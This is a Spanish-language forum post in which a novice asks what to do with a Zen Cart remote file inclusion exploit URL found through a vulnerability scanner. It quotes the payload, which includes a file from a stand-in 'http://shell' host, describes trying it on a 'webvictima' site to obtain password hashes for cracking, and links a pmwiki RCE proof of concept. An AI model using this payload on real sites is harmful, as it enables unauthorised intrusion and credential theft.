scanee una web php (con SSS) y me salieron muchas vulneravilidades (rojo)
le di al numero de una vulneravilidad como dice en el manual y me salio una pagina luego le di click en exploit...
me salio lo siguiente: Attackers can exploit these issues via a web client.
y un link asi: /data/vulnerabilities/exploits/zencart-rfi.txt
le doy click en el link y me sale lo siguiente en todo una pagina:
http://www.example.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
la verdad soy nuevo en esto asi que me gustaria saber que es eso... un exploit?
que hago con eso?
intente ponerlo asi como dice el ejemplo:
http://webvictima.com/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
y solo me salen noticias pero ninguna lista de numeros y letras (algo asi hice la ves pasada con una web y utilice un crackeador)}
12132gh3213h3213k323g323g32
23342n4nl4k343hjg4h3g3h34344
ewkjnje6ewew5ew6e4eq0we93e
bueno no se si me equivoco aver si me entienden y me pueden ayudar si?
pd.- hay muchas bulneravilidades por ejemplo en una me sale para utilizar un exploit asi:
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesionhttp://downloads.securityfocus.com/vulnerabilities/exploits/pmwiki2.1.19_zend_hash_rce_poc.txt
salu2
Autor